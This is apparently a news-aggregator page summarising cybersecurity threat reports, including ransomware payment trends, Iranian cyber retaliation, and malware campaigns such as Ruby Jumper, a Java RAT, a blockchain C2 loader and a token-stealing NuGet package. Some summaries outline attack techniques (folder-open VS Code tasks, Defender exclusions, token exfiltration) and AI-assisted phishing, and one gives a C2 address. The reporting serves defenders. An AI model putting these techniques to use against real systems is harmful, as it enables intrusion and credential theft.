All news with #threat report tag

🔐 The article summarizes seven factors limiting organizations' ability to build sustainable cybersecurity talent pipelines and cites World Economic Forum data showing only 14% of organizations feel they have the required people and skills. Contributors highlight constrained budgets and rising burnout, the rapid emergence of AI and other technologies, and misaligned employer–candidate expectations as core drivers. Additional issues include outdated processes, training mismatches, strategy disconnects, and failures to simplify and scale operations. Experts recommend internal upskilling, using managed services and automation, and framing the skills gap as a clear business risk to leadership.

⚠ John Hultquist, chief analyst of Google’s Threat Intelligence Group, warned that Iran will "absolutely" respond to recent US and Israeli air strikes with cyber-attacks targeting a broad array of organisations across the Middle East and beyond. He said the focus will shift from well-defended states like Israel to nations with less mature security, expanding the global attack surface. Hultquist highlighted the blurred lines between state actors, criminal groups and hacktivist fronts, noting the likely use of ransomware and proxy operations by the IRGC to obfuscate attribution. The UK’s NCSC has advised organisations with Middle East ties to urgently review and strengthen their cybersecurity posture.

🌐 A sharp escalation in the Middle East has entered a hybrid phase combining military strikes with large-scale cyber operations following joint Israeli–US strikes on Iran on 28 February 2026. CloudSek reported a sweeping cyber campaign that reduced Iran's internet to roughly 4% of normal capacity, disrupting government services, media and parts of energy and aviation. Security firm Halcyon warns of rising DDoS, hacktivist and ransomware activity and urges organisations to increase monitoring, enforce multi-factor authentication and maintain offline backups against supply-chain and regional spillover risks.

⚡ The week's highlights show attackers exploiting critical infrastructure, cloud APIs, AI tooling, and consumer devices. Cisco SD‑WAN zero‑day (CVE‑2026‑20127) is being actively exploited to gain administrative access, while a string of high‑severity CVEs across vendors requires immediate attention. Misuse of trusted services — from Google Sheets and Gemini to autonomous AI agents — combined with exposed keys, is enabling stealthy, scalable access. Organizations should prioritize patching, tighten access to AI and cloud keys, and use continuous testing to validate defenses.

🔒 Chainalysis reports that total ransomware cryptocurrency payments fell 8% year-on-year to $820m in 2025, even as the number of victims surged 50% to make 2025 the most active year on record. Payment rates dropped from 63% in 2024 to 29% in 2025, while the median ransom rose 368% to $59,556. The firm attributes these shifts to improved incident response, global disruption of infrastructure and laundering networks, cryptographic flaws in strains like VolkLocker, and fragmentation of ransomware-as-a-service into numerous smaller groups.

🔍 Chainalysis reports ransomware actors collected $820 million in 2025, a 28% decline from 2024 despite a roughly 50% rise in reported attacks year-over-year. Analysts attribute the drop to broader adherence to guidance discouraging ransom payments and to legal risks associated with payouts. At the same time, the average ransom payment jumped 368% to nearly $60,000, suggesting individual victims who do pay are settling for much larger sums to prevent data resale or exposure.

🔎 Europol-led Operation Compass has resulted in 30 arrests and linked 179 suspects to The Com, a decentralized cybercrime collective that targets children and teenagers. Launched in January 2025 and coordinated with law enforcement from 28 countries, the action identified 62 victims and directly safeguarded four. Investigators mapped multiple subgroups—Offline Com, Cyber Com, and (S)extortion Com—that facilitate violence, intrusions, and sexual exploitation.

🛡️ Royal Hansen, VP Engineering at Google, outlines how Google Cloud is confronting emergent cybersecurity risks as AI reshapes the threat landscape. He emphasizes AI-powered malware, supply-chain and training-data poisoning, and governance challenges tied to loss-of-control of AI infrastructure. Google is advancing controls—tamper-proof provenance, model-level protections, Identity and Access Management, and treating prompts like code—while rolling out agentic workflows to augment SOC teams. The post also consolidates recent threat intelligence, incident responses, and practitioner resources.

🔎 APT37 has launched the 'Ruby Jumper' campaign using removable-media infection tools to compromise air‑gapped systems, researchers at Zscaler ThreatLabz found. The actor abused malicious .LNK shortcuts to run a PowerShell stager that extracts multiple embedded payloads and deploys a new implant, Restleaf, which uses Zoho WorkDrive for C2. Additional undocumented tools—SnakeDropper, ThumbSBD, VirusTask and FootWine—enable in‑memory execution, USB propagation and staged exfiltration.

🔒 In December 2025, Zscaler ThreatLabz exposed the Ruby Jumper campaign linking North Korea's ScarCruft to a novel multi-stage intrusion that abuses cloud storage and removable media. The attack begins with a malicious LNK that launches PowerShell to extract an embedded decoy document and multiple payloads, including the in-memory loader RESTLEAF. RESTLEAF uniquely leverages Zoho WorkDrive for C2 to fetch shellcode and stage follow-on components, while SNAKEDROPPER, THUMBSBD, and VIRUSTASK enable persistence, surveillance, and propagation to air-gapped systems via USB.

🎮 Microsoft Threat Intelligence warns that threat actors are distributing trojanized gaming utilities via browsers and chat platforms to deliver a Java-based remote access trojan (RAT). A malicious downloader stages a portable Java runtime and executes a jd-gui.jar, leveraging PowerShell and LOLBins like cmstp.exe for stealth and self-deletion while configuring Microsoft Defender exclusions. Persistence is achieved with a scheduled task and a startup script named world.vbs, and the final payload phones home to 79.110.49[.]15 for command-and-control.

⛓️ A newly discovered loader named Aeternum relocates botnet command-and-control onto the Polygon blockchain, researchers at Qrator Research Lab report. Infected machines retrieve instructions written as on-chain transactions and poll more than 50 RPC endpoints instead of contacting centralized servers or domains. The seller offers native C++ builds and a web dashboard that writes commands to smart contracts, creating a low-cost, resilient C2 channel that complicates traditional takedowns and shifts defensive emphasis to edge filtering and proactive DDoS mitigation.

📧 Darktrace detected more than 32 million high-confidence phishing emails in 2025, signaling a major escalation in identity-driven attacks and automated campaigns. Over 8.2 million of those targeted VIPs, while 1.6 million originated from newly created domains and 1.2 million included malicious QR codes. The vendor reported 70% of phishing passed DMARC, 41% were spear-phishing and 38% used novel social-engineering techniques, highlighting attackers’ growing sophistication and emphasis on credential compromise.

🔒 Chainalysis reports that the proportion of ransomware victims who paid extortionists fell to a record low of 28% in 2025, even as claimed attacks rose sharply. The blockchain intelligence firm says total on-chain ransomware receipts currently total $820 million and may approach or exceed $900 million as more events are attributed. While total payment counts remained relatively stable, the median ransom surged 368% to $59,556, and analysts flagged growing fragmentation and several high-impact breaches.

🔒 Chainalysis reports the ransomware victim payment rate fell to 28% in 2025, an all-time low, even as claimed attacks rose about 50% year-over-year. On-chain ransomware receipts totaled $820 million so far and may approach $900 million, while the median ransom jumped to $59,556, up 368% from 2024. Analysts point to improved incident response, regulatory scrutiny, law enforcement actions, and market fragmentation. The report also notes 85 active extortion groups and that initial access brokers earned roughly $14 million in 2025.

⚠️ A coordinated developer-targeting campaign uses fake Next.js repositories and job-assessment lures to trick engineers into executing attacker-controlled JavaScript at runtime. Microsoft and third-party researchers identified three execution paths — VS Code workspace tasks (runOn: "folderOpen"), dev-server builds, and backend startup — that all fetch loaders from staging services like Vercel. The in-memory payload profiles hosts, polls for an instanceId and executes server-supplied code to maintain persistent C2 while minimizing disk artifacts.

⚠ A malicious NuGet package, StripeApi.Net, was uploaded on February 16, 2026 and impersonated Stripe.net by reusing the official icon, a near-identical README and inflated download counts across hundreds of versions. The package implemented legitimate payment functions but altered key methods to capture and exfiltrate Stripe API tokens while leaving payment processing appearing to work normally. ReversingLabs discovered and reported the package and it was removed from NuGet before wide impact.

⚠️ Steaelite is a browser-based remote access trojan marketed on underground forums that consolidates remote access, credential harvesting, data exfiltration, and a planned ransomware module into a single management pane. Researchers at BlackFog say the toolkit includes live screen streaming, webcam and microphone access, password recovery, Defender-disable capabilities, and persistence options, and it’s been available since last November. The seller offers access as malware-as-a-service (about $200/month), and defenders are urged to prioritize stopping data exfiltration over relying solely on perimeter defenses.

🔍 This Fortinet analysis dissects a recent multi-stage campaign deploying Agent Tesla, which targets Windows users with credential theft and keylogging. The chain uses spearphishing with RAR attachments containing obfuscated JSE loaders that fetch encrypted PowerShell scripts and reflectively load .NET assemblies in memory. Operators leverage process hollowing, virtualization and sandbox checks, and SMTP-based exfiltration to minimize detection. Fortinet telemetry and cross-product protections are highlighted to help organizations mitigate the threat.

⚠️ CrowdStrike's Global Threat Report 2026 warns that AI-enabled cyber-attacks rose 89% in 2025 as adversaries used machine learning and LLMs to scale and refine phishing, disinformation and malware operations. Researchers observed LLMs producing multilingual, convincing phishing lures and automating campaign creation, while some actors embedded prompting into malware (eg, LameHug) for reconnaissance. CrowdStrike recommends strong identity controls, AI-focused awareness training and threat-intel monitoring to mitigate the accelerating threat.